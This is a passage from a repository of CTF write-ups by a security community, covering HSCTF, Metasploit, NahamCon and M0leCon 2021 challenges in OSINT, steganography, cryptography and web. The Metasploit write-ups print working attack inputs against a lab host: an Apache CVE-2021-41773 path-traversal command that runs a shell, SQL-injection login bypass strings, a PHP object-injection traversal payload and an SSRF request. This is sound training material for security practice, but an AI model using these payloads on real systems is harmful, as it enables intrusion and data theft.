20 | https://www.google.com/maps/@35.8980331,14.517993,0a,75y,357.04h,87.26t/data=!3m4!1e1!3m2!1sv4-Tz3_nciJr10A1On3UZA!2e0
21 |
22 | Round up
23 |
24 | ```
25 | 35.898,14.518
26 | ```
27 |
28 | **Image 2**
29 |
30 | https://www.google.com/maps/@43.9376526,12.4458733,0a,75y,4.8h,110.46t/data=!3m4!1e1!3m2!1sRBMGZ4AMaKcpoI7txtv7IQ!2e0
31 |
32 | Round up
33 |
34 | ```
35 | 43.938,12.446
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/hsctf_2021/misc/Geographic2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | Geographic 2 Writeup
4 | desc: Check out our writeup for Geographic 2 for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: Geographic 2
10 | tags: "misc, starry, osint"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | **Image** **1**
19 |
20 | ```
21 | Id. Antall József rkp.
22 | 47.504,19.044
23 | ```
24 |
25 | https://maps.app.goo.gl/a8u8REGKuZv6LToe6
26 |
27 |
28 | **Image 2**
29 |
30 | ```
31 | Schwimmende Wiese
32 | 53.62,11.41
33 | ```
34 |
35 | https://maps.app.goo.gl/Pf73iVT5pMxuTiiE7
36 |
37 |
38 | **Image 3**
39 |
40 | ```
41 | CERVESA ALPHA
42 | 42.569,1.489
43 | ```
44 |
45 | https://maps.app.goo.gl/Uk4EBhjeHtNKZP996
46 |
47 |
--------------------------------------------------------------------------------
/hsctf_2021/misc/glasswindows.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | glass-windows Writeup
4 | desc: Check out our writeup for glass-windows for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: glass-windows
10 | tags: "misc, taz, stegano"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | 
19 |
20 | Similarly as the previous i used stegsolve and changed some planes to get the flag
21 |
22 | 
23 |
24 | ```
25 | flag{this_is_why_i_use_premultiplied_alpha}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/hsctf_2021/misc/palletsofgold.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | pallets-of-gold Writeup
4 | desc: Check out our writeup for pallets-of-gold for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: pallets-of-gold
10 | tags: "misc, taz, stegano"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | 
19 |
20 | After doing some basic analysis I passed it through stegsolve and changed some planes and got the flag.
21 |
22 | 
23 |
24 | ```
25 | flag{plte_chunks_remind_me_of_gifs}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/hsctf_2021/web/NRCnorightclick.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | NRC - no right click Writeup
4 | desc: Check out our writeup for NRC - no right click for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: web
9 | challenge: NRC - no right click
10 | tags: "web, starry"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | To bypass the right click problem:
19 |
20 | ```
21 | view-source:https://no-right-click.hsc.tf/useless-file.css
22 | ```
23 |
24 | 
25 |
26 |
--------------------------------------------------------------------------------
/hsctf_2021/web/grading.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | grading Writeup
4 | desc: Check out our writeup for grading for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: web
9 | challenge: grading
10 | tags: "web, taz"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | Simply login as `admin` using password `admin`
19 | Go to the simple quiz section and here we have the flag.
20 |
21 | 
22 |
23 | ```
24 | flag{th3_an5w3r_w4s_HSCTF_0bvi0us1y}
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/m0lecon_2021/README.md:
--------------------------------------------------------------------------------
1 | # M0leCon CTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Web](web.md)
--------------------------------------------------------------------------------
/m0lecon_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | M0leCon 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: M0Lecon 2021
7 | ---
--------------------------------------------------------------------------------
/metasploit_2021/10_of_clubs.md:
--------------------------------------------------------------------------------
1 | ## 10 of clubs
2 |
3 | > Solved by: Starry-Lord
4 |
5 | ```
6 | port 12380
7 | ```
8 |
9 | This port was using Apache httpd 2.4.49 and I found a good research on the subject here:
10 |
11 | https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
12 |
13 |
14 | I didn't need to get a shell. ls and cat commands were enough to extract the png:
15 |
16 |
17 | ```
18 | curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'
19 | ```
20 |
21 | 
--------------------------------------------------------------------------------
/metasploit_2021/10_of_clubs/10ofclubs.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 10 of clubs Writeup
4 | desc: Check out our writeup for 10 of clubs for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 10_of_clubs
9 | challenge: 10 of clubs
10 | tags: "web, starry, cve, rce"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | ```
19 | port 12380
20 | ```
21 |
22 | This port was using Apache httpd 2.4.49 and I found a good research on the subject here:
23 |
24 | https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
25 |
26 |
27 | I didn't need to get a shell. ls and cat commands were enough to extract the png:
28 |
29 |
30 | ```
31 | curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'
32 | ```
33 |
34 | 
--------------------------------------------------------------------------------
/metasploit_2021/2_of_spades.md:
--------------------------------------------------------------------------------
1 | ## 2 of spades
2 |
3 | > Solved by: Taz34
4 |
5 | Did a NIKTO scan on the target
6 |
7 | ```
8 | nikto -h http://172.17.15.117:443/
9 | ```
10 |
11 | and one of the lines in the result showed this :
12 |
13 | ```
14 | + /.env: .env file found. The .env file may contain credentials.
15 | ```
16 |
17 | so i headed to this sub directory
18 |
19 | 
20 |
21 | inserted the file name in the URL
22 |
23 | ```
24 | http://172.17.15.117:443/3e6f0e21-7faa-429f-8a1d-3f715a520da4.png
25 | ```
26 |
27 | 
28 |
29 | and we have the flag.
--------------------------------------------------------------------------------
/metasploit_2021/2_of_spades/2ofspades.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 2 of spades Writeup
4 | desc: Check out our writeup for 2 of spades for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 2_of_spades
9 | challenge: 2 of spades
10 | tags: "web, taz, nikto"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | Did a NIKTO scan on the target
19 |
20 | ```
21 | nikto -h http://172.17.15.117:443/
22 | ```
23 |
24 | and one of the lines in the result showed this :
25 |
26 | ```
27 | + /.env: .env file found. The .env file may contain credentials.
28 | ```
29 |
30 | so i headed to this sub directory
31 |
32 | 
33 |
34 | inserted the file name in the URL
35 |
36 | ```
37 | http://172.17.15.117:443/3e6f0e21-7faa-429f-8a1d-3f715a520da4.png
38 | ```
39 |
40 | 
41 |
42 | and we have the flag.
--------------------------------------------------------------------------------
/metasploit_2021/4_of_diamonds.md:
--------------------------------------------------------------------------------
1 | ## 4 of diamonds
2 |
3 | > Solved by: Starry-Lord
4 |
5 | ```
6 | Port 10010
7 | ```
8 |
9 | Here we had a web app with a register and login page.
10 |
11 | Registering gave access to the website and showed that the user details were stored in a javascript variable in the response.
12 |
13 | ```javascript
14 |
20 | ```
21 |
22 | By intercepting the register request, I noticed I was sending account[username]=starlord like parameters, and decided to add account[role]=admin to see if it would give me admin privilege.
23 |
24 | By doing so I got a session with an additional admin button, which gave me the flag.
25 |
26 | 
--------------------------------------------------------------------------------
/metasploit_2021/4_of_diamonds/4ofdiamonds.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 4 of diamonds Writeup
4 | desc: Check out our writeup for 4 of diamonds for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 4_of_diamonds
9 | challenge: 4 of diamonds
10 | tags: "web, starry"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | ```
19 | Port 10010
20 | ```
21 |
22 | Here we had a web app with a register and login page.
23 |
24 | Registering gave access to the website and showed that the user details were stored in a javascript variable in the response.
25 |
26 | ```javascript
27 |
33 | ```
34 |
35 | By intercepting the register request, I noticed I was sending account[username]=starlord like parameters, and decided to add account[role]=admin to see if it would give me admin privilege.
36 |
37 | By doing so I got a session with an additional admin button, which gave me the flag.
38 |
39 | 
--------------------------------------------------------------------------------
/metasploit_2021/4_of_hearts.md:
--------------------------------------------------------------------------------
1 | ## 4 of hearts
2 |
3 | > Solved by: everyone
4 |
5 | ```
6 | Port 80
7 | ```
8 |
9 | Free Flag for the ones who managed to set their socks properly and access challenges.
10 |
11 | 
--------------------------------------------------------------------------------
/metasploit_2021/4_of_hearts/4ofhearts.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 4 of hearts Writeup
4 | desc: Check out our writeup for 4 of hearts for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 4_of_hearts
9 | challenge: 4 of hearts
10 | tags: "web"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: everyone
17 |
18 | ```
19 | Port 80
20 | ```
21 |
22 | Free Flag for the ones who managed to set their socks properly and access challenges.
23 |
24 | 
--------------------------------------------------------------------------------
/metasploit_2021/5_of_diamonds.md:
--------------------------------------------------------------------------------
1 | ## 5 of diamonds
2 |
3 | > Solved by: Starry-Lord, Thewhiteh4t, Bobbysox
4 |
5 | ```
6 | Port 11111
7 | ```
8 |
9 | This was an SQL Injection vulnerability. We had many problems for this one in terms of stability, in fact only one could attack it with sqlmap at the time.
10 |
11 | We managed to get the password out from the database, which was a very long alpha-numeric string, bigger than max amount of chars accepted by the input field on the login page.
12 |
13 | Passing the password with burp solved the problem and displayed a link to flag.png
14 |
15 | ### Afterthought
16 |
17 | We could bypass login through the username field with
18 |
19 | ```
20 | username=X'or 1=1 --
21 | password=notThePassword
22 | ```
23 |
24 | but i missed that we could also simply bypass authentication with the password field:
25 |
26 | ```
27 | username=admin
28 | password='or 1=1 --
29 | ```
30 |
31 | 
--------------------------------------------------------------------------------
/metasploit_2021/5_of_diamonds/5ofdiamonds.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 5 of diamonds Writeup
4 | desc: Check out our writeup for 5 of diamonds for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 5_of_diamonds
9 | challenge: 5 of diamonds
10 | tags: "web, starry, twh, bobby, sql, sqli"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord, Thewhiteh4t, Bobbysox
17 |
18 | ```
19 | Port 11111
20 | ```
21 |
22 | This was an SQL Injection vulnerability. We had many problems for this one in terms of stability, in fact only one could attack it with sqlmap at the time.
23 |
24 | We managed to get the password out from the database, which was a very long alpha-numeric string, bigger than max amount of chars accepted by the input field on the login page.
25 |
26 | Passing the password with burp solved the problem and displayed a link to flag.png
27 |
28 | ### Afterthought
29 |
30 | We could bypass login through the username field with
31 |
32 | ```
33 | username=X'or 1=1 --
34 | password=notThePassword
35 | ```
36 |
37 | but i missed that we could also simply bypass authentication with the password field:
38 |
39 | ```
40 | username=admin
41 | password='or 1=1 --
42 | ```
43 |
44 | 
--------------------------------------------------------------------------------
/metasploit_2021/9_of_diamonds.md:
--------------------------------------------------------------------------------
1 | ## 9 of diamonds
2 |
3 | > Solved By : thewhiteh4t
4 |
5 | ```
6 | Port : 8080
7 | ```
8 |
9 | In this challenge we were presented with a website about cookies, obvious hint.
10 | There were 3 sections :
11 |
12 | - User Registration
13 | - User Login
14 | - Admin Login
15 |
16 | First I registered a user account and checked the cookies, there were 4 cookies for our user :
17 |
18 | - admin : false
19 | - authenticated-user : true
20 | - made-an-account : true
21 | - visited-main-page : true
22 |
23 | I just had to modify admin from false to true and send the request and we got the flag.
24 |
25 | 
--------------------------------------------------------------------------------
/metasploit_2021/9_of_diamonds/9ofdiamonds.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 9 of diamonds Writeup
4 | desc: Check out our writeup for 9 of diamonds for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 9_of_diamonds
9 | challenge: 9 of diamonds
10 | tags: "web, twh"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | ```
19 | Port : 8080
20 | ```
21 |
22 | In this challenge we were presented with a website about cookies, obvious hint.
23 | There were 3 sections :
24 |
25 | - User Registration
26 | - User Login
27 | - Admin Login
28 |
29 | First I registered a user account and checked the cookies, there were 4 cookies for our user :
30 |
31 | - admin : false
32 | - authenticated-user : true
33 | - made-an-account : true
34 | - visited-main-page : true
35 |
36 | I just had to modify admin from false to true and send the request and we got the flag.
37 |
38 | 
--------------------------------------------------------------------------------
/metasploit_2021/README.md:
--------------------------------------------------------------------------------
1 | ## MetaSploit CTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [2 of Spades](2_of_spades.md)
8 | * [3 of Hearts](3_of_hearts.md)
9 | * [4 of Diamonds](4_of_diamonds.md)
10 | * [4 of Hearts](4_of_hearts.md)
11 | * [5 of Diamonds](5_of_diamonds.md)
12 | * [9 of Diamonds](9_of_diamonds.md)
13 | * [10 of Clubs](10_of_clubs.md)
14 | * [Ace of Hearts](ace_of_hearts.md)
15 | * [Jack of Hearts](jack_of_hearts.md)
--------------------------------------------------------------------------------
/metasploit_2021/ace_of_hearts.md:
--------------------------------------------------------------------------------
1 | ## ace of hearts
2 |
3 | > Solved by: Starry-Lord
4 |
5 | ```
6 | Port 20011
7 | ```
8 |
9 | We had a image gallery here with 4 user galleries.
10 |
11 | Sarah’s gallery
12 | John’s gallery
13 | Ripley’s gallery
14 | Ash’s gallery
15 |
16 | John’s gallery was not accessible, set to private.
17 |
18 | When querying any other gallery, we could see the URL changing like so:
19 |
20 | ```
21 | http://172.17.15.117:20011/gallery?galleryUrl=/admin
22 | ```
23 |
24 | I tried to call the admin gallery through local-host and got access to the admin panel, where I just had to untick a box for making John’s gallery public.
25 |
26 | ```
27 | http://172.17.15.117:20011/gallery?galleryUrl=http://127.0.0.1:20011/admin
28 | ```
29 |
30 | He had this flag inside:
31 |
32 | 
33 |
34 | > Yay an Ace!!!
35 | > — Starry-Lord
--------------------------------------------------------------------------------
/metasploit_2021/ace_of_hearts/aceofhearts.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | ace of hearts Writeup
4 | desc: Check out our writeup for ace of hearts for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: ace_of_hearts
9 | challenge: ace of hearts
10 | tags: "web, starry"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | ```
19 | Port 20011
20 | ```
21 |
22 | We had a image gallery here with 4 user galleries.
23 |
24 | Sarah’s gallery
25 | John’s gallery
26 | Ripley’s gallery
27 | Ash’s gallery
28 |
29 | John’s gallery was not accessible, set to private.
30 |
31 | When querying any other gallery, we could see the URL changing like so:
32 |
33 | ```
34 | http://172.17.15.117:20011/gallery?galleryUrl=/admin
35 | ```
36 |
37 | I tried to call the admin gallery through local-host and got access to the admin panel, where I just had to untick a box for making John’s gallery public.
38 |
39 | ```
40 | http://172.17.15.117:20011/gallery?galleryUrl=http://127.0.0.1:20011/admin
41 | ```
42 |
43 | He had this flag inside:
44 |
45 | 
46 |
47 | > Yay an Ace!!!
48 | > — Starry-Lord
--------------------------------------------------------------------------------
/metasploit_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | MetaSploit 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | ---
--------------------------------------------------------------------------------
/metasploit_2021/jack_of_hearts.md:
--------------------------------------------------------------------------------
1 | ## jack of hearts
2 |
3 | > Solved By : thewhiteh4t
4 |
5 | ```
6 | Port : 20022
7 | ```
8 |
9 | - User cookie is double base64 encoded, so we double decoded and ended up with the following :
10 |
11 | ```
12 | O:4:"user":3:{
13 | s:8:"username";s:4:"user";
14 | s:5:"admin";b:0;
15 | s:11:"profile_img";s:23:"/var/www/html/guest.png";
16 | }
17 | ```
18 |
19 | ```
20 | O -> Object
21 | O:4 -> Object of length 4
22 | :3: -> Object has 3 attributes
23 | s -> String data type
24 | s:8 -> String of length 8
25 | b -> Boolean data type
26 | b:0 -> False
27 | ```
28 |
29 | - This was a **PHP Object Injection** challenge
30 | - The goal of this challenge was not to become admin and if we try then the server sends hints or funny responses
31 | - Directly accessing the flag did not work so we can simply use `../`
32 | - Final payload :
33 |
34 | ```
35 | O:4:"user":3:{
36 | s:8:"username";s:4:"user";
37 | s:5:"admin";b:0;
38 | s:11:"profile_img";s:40:"/var/www/html/../../../../../../flag.png";
39 | }
40 | ```
41 |
42 | 
--------------------------------------------------------------------------------
/nahamcon_2021/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2021
2 |
3 |
4 | 
5 |
6 |
7 | ## WriteUps
8 |
9 | We have added all the challenges we were able to solve, this is not a complete list.
10 |
11 | * [Android](android.md)
12 | * [Cryptography](crypto.md)
13 | * [Forensics](forensics.md)
14 | * [Misc](misc.md)
15 | * [Mission](mission.md)
16 | * [OSINT](osint.md)
17 | * [Steganography](stego.md)
18 | * [Web](web.md)
--------------------------------------------------------------------------------
/nahamcon_2021/android.md:
--------------------------------------------------------------------------------
1 | # Android
2 |
3 | ## Andra
4 |
5 | unzip the file you will find the flag at :
6 |
7 | ```
8 | andra/res/layout/activity_flag.xml
9 | ```
10 |
11 | ----------
12 |
13 | ## Resourceful
14 |
15 | * enable usb debugging
16 | * connect usb
17 | * use adb shell
18 |
19 | 
20 |
21 | * flag will appear on phone
22 |
23 | 
24 |
--------------------------------------------------------------------------------
/nahamcon_2021/android/Andra.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Andra Writeup
4 | desc: Check out our writeup for Andra for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: android
9 | challenge: Andra
10 | tags: "android"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | unzip the file you will find the flag at :
18 |
19 | ```
20 | andra/res/layout/activity_flag.xml
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/android/Resourceful.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Resourceful Writeup
4 | desc: Check out our writeup for Resourceful for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: android
9 | challenge: Resourceful
10 | tags: "android, adb"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | * enable usb debugging
18 | * connect usb
19 | * use adb shell
20 |
21 | 
22 |
23 | * flag will appear on phone
24 |
25 | 
26 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/CarKeys.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Car Keys Writeup
4 | desc: Check out our writeup for Car Keys for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: Car Keys
10 | tags: "crypto, cipher"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 | keyed caesar cipher
17 |
18 | https://www.boxentriq.com/code-breaking/keyed-caesar-cipher
19 |
20 | use the key: `QWERTY`
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/DiceRoll.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Dice Roll Writeup
4 | desc: Check out our writeup for Dice Roll for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: Dice Roll
10 | tags: "crypto, rng, python"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | The given script suggests that it is using random number generators, python uses mersenne twister algorithm, googling we find a github repo of python module which enable us to predict the number.
18 |
19 | https://github.com/kmyk/mersenne-twister-predictor
20 |
21 |
22 | We use the following code, to automate the process using pwntools
23 |
24 | ```
25 | from pwn import *
26 | from mt19937predictor import MT19937Predictor
27 | import re
28 | predictor = MT19937Predictor()
29 |
30 | r = remote('challenge.nahamcon.com' , '31784')
31 | r.recvuntil('> ')
32 | for i in range (0, 625):
33 |
34 | r.sendline('2')
35 | text = r.recvuntil('> ')
36 | print(text)
37 | num = [int(s) for s in text.split() if s.isdigit()]
38 | print(num)
39 | num = num[0]
40 | predictor.setrandbits(num, 32)
41 |
42 | flag = predictor.getrandbits(32)
43 | r.sendline('3')
44 | print(r.recvuntil('> '))
45 | r.sendline(str(flag))
46 | print(r.recv(2048))
47 | ```
48 |
49 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/Treasure.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Treasure Writeup
4 | desc: Check out our writeup for Treasure for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: Treasure
10 | tags: "crypto, cipher"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | * title is `treasure`
18 | * if you search for `treasure` cipher you will land on beale cipher
19 | * and eventually, book cipher
20 |
21 | https://www.dcode.fr/book-cipher
22 |
23 | 
24 |
25 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/chickenwings.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | chicken wings Writeup
4 | desc: Check out our writeup for chicken wings for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: chicken wings
10 | tags: "crypto, cipher"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | WingDing Cipher : https://lingojam.com/WingDing
18 |
19 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/esab64.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | esab64 Writeup
4 | desc: Check out our writeup for esab64 for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: esab64
10 | tags: "crypto"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Its base64 backwards
18 |
19 | initial string in file: `mxWYntnZiVjMxEjY0kDOhZWZ4cjYxIGZwQmY2ATMxEzNlFjNl13X`
20 |
21 | The name is backwards so i reversed the string to:
22 |
23 | `X31lNjFlNzExMTA2YmQwZGIxYjc4ZWZhODk0YjExMjViZntnYWxm`
24 |
25 | base64 decode to: `_}e61e711106bd0db1b78efa894b1125bf{galf`
26 |
27 | reverse the string once again for flag: `flag{fb5211b498afe87b1bd0db601117e16e}_`
28 |
29 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/veebee.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | veebee Writeup
4 | desc: Check out our writeup for veebee for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: veebee
10 | tags: "crypto, vbe, vbs"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | Visual Basic Script can be encoded and they become vbe files, there are some encoders in the wild, python one did not work but there is another decoder here which works : https://www.interclasse.com/scripts/decovbe.php
18 |
19 | * put the code in a .vbs file
20 | * launch a cmd and execute
21 |
22 | ```
23 | wscript decode.vbs veebee.vbe
24 | ```
25 |
26 | * a dialogue box will open with the flag in it
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2021/forensics/buzz.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | buzz Writeup
4 | desc: Check out our writeup for buzz for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: forensics
9 | challenge: buzz
10 | tags: "forensics"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | ```
18 | $ mv buzz flag.z
19 | $ uncompress flag.z
20 | $ cat flag
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | ---
--------------------------------------------------------------------------------
/nahamcon_2021/misc.md:
--------------------------------------------------------------------------------
1 | # misc
2 |
3 | ## eighth_circle
4 |
